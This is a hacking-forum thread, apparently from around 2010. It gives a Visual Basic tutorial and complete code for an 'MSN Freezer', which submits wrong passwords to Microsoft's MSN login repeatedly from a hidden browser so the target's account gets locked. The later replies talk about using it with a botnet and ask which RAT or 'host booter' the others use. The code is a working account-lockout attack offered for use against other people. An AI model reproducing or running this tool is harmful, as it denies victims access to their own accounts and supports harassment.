Results 1 to 7 of 7
  1. #1
    genocide4fun's Avatar
    Join Date
    May 2009
    Gender
    male
    Location
    Central.
    Posts
    52
    Reputation
    10
    Thanks
    3
    My Mood
    Dead

    [Tut]Make an MSN Freezer[Leeched]

    Hello,

    What are we going to do?
    - Making a MSN Freezer.

    What does a msn freezer does?
    - Making an msn account freeze so the MSN Account can't be accessed.

    What program do i need to make an MSN Freezer?
    - For this TUT you will need Visual basic 2008

    Ok let's start

    - Open Visual Basic 2008
    - Open new project and call it whatever you like
    - Make 1 textbox
    - Make a checkbox with text "Hide"
    - Make 2 buttons with text "Freeze" and "Unfreeze"
    - Make a webbrowser with visible set FALSE and set url: "https://mobile.msn.com/hm/folder.phpx".
    - Make 3labels with label1 text set. "MSN Adress", label2: "Status" and the last one with nothing "".
    - Make a timer with Enabled set FALSE and Interval set 100.
    - Now double click on the Form and remove all text
    Copy and paste this :

    Code:
    Imports System.Threading.Thread
    Public Class Form1
    
        Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
            WebBrowser1.Navigate("https://mobile.msn.com/hm/folder.phpx")
    
        End Sub
    
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
            Timer1.Enabled = True
            Label3.Text = "Freezing..."
        End Sub
    
        Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
            On Error GoTo errordetected
            WebBrowser1.Document.GetElementById("LoginTextBox").SetAttribute("value", (TextBox1.Text))
            WebBrowser1.Document.GetElementById("PasswordTextBox").SetAttribute("value", ("pas13465"))
            Sleep(2000)
            WebBrowser1.Document.GetElementById("PasswordSubmit").InvokeMember("click")
    
            GoTo done
    errordetected:
            Label3.Text = "Frozen!"
            WebBrowser1.Navigate("https://mobile.msn.com/hm/folder.phpx")
    done:
    
        End Sub
    
        Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
            Label3.Text = "Ready"
            MsgBox("MSN UnFrozen!")
            Timer1.Enabled = False
        End Sub
    
        Private Sub CheckBox1_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles CheckBox1.CheckedChanged
            If CheckBox1.Checked = True Then
                Me.Hide()
            End If
        End Sub
    End Class
    Now you can build the program and use it as a MSN Freezer!!


    NextGen1 - Credits to Punicher and Numerous others - Code Leeched
    Last edited by NextGen1; 05-17-2010 at 07:42 AM.

  2. #2
    /b/oss's Avatar
    Join Date
    Feb 2010
    Gender
    male
    Posts
    13,651
    Reputation
    795
    Thanks
    3,547
    mah... it's not real frezzer only fake

  3. #3
    genocide4fun's Avatar
    Join Date
    May 2009
    Gender
    male
    Location
    Central.
    Posts
    52
    Reputation
    10
    Thanks
    3
    My Mood
    Dead
    True, but it gets the job done. If you are a real hacker and have a bot net and have i freeze an MSN with this it will be frozen until your botnet is gone.

  4. #4
    /b/oss's Avatar
    Join Date
    Feb 2010
    Gender
    male
    Posts
    13,651
    Reputation
    795
    Thanks
    3,547
    i will try, PM you resoults..

  5. #5
    genocide4fun's Avatar
    Join Date
    May 2009
    Gender
    male
    Location
    Central.
    Posts
    52
    Reputation
    10
    Thanks
    3
    My Mood
    Dead
    What RAT/Host Booter do you use?

  6. #6
    Blubb1337's Avatar
    Join Date
    Sep 2009
    Gender
    male
    Location
    Germany
    Posts
    5,915
    Reputation
    161
    Thanks
    3,108
    This tutorials lacks a bit...thanks for sharing tho



  7. #7
    NextGen1's Avatar
    Join Date
    Dec 2009
    Gender
    male
    Location
    Not sure really.
    Posts
    6,312
    Reputation
    382
    Thanks
    3,019
    My Mood
    Amazed
    Thanks for sharing. However, You leeched this and took credits for it,

    ---Added proper credits and removed your "Claim" of it being yours.....

    Last edited by NextGen1; 05-17-2010 at 07:43 AM.


     


     


     



    The Most complete application MPGH will ever offer - 68%




Similar Threads

  1. How can I make an MSN Freezer?
    By g0t5k111z2 in forum Visual Basic Programming
    Replies: 7
    Last Post: 07-04-2010, 11:25 PM
  2. [TUT] How To Make a MSN Status Changer
    By tempta43 in forum Visual Basic Programming
    Replies: 11
    Last Post: 05-08-2010, 08:11 AM
  3. [TUT] Make A Korean WarRock Account
    By castaway in forum WarRock Korea Hacks
    Replies: 185
    Last Post: 12-20-2008, 03:36 AM
  4. [TUT] Making trainer in UCE
    By nabbos in forum WarRock - International Hacks
    Replies: 2
    Last Post: 05-27-2007, 03:18 AM
  5. Jack's Tut-Making Tut
    By Jackal in forum Tutorials
    Replies: 8
    Last Post: 07-15-2006, 01:51 AM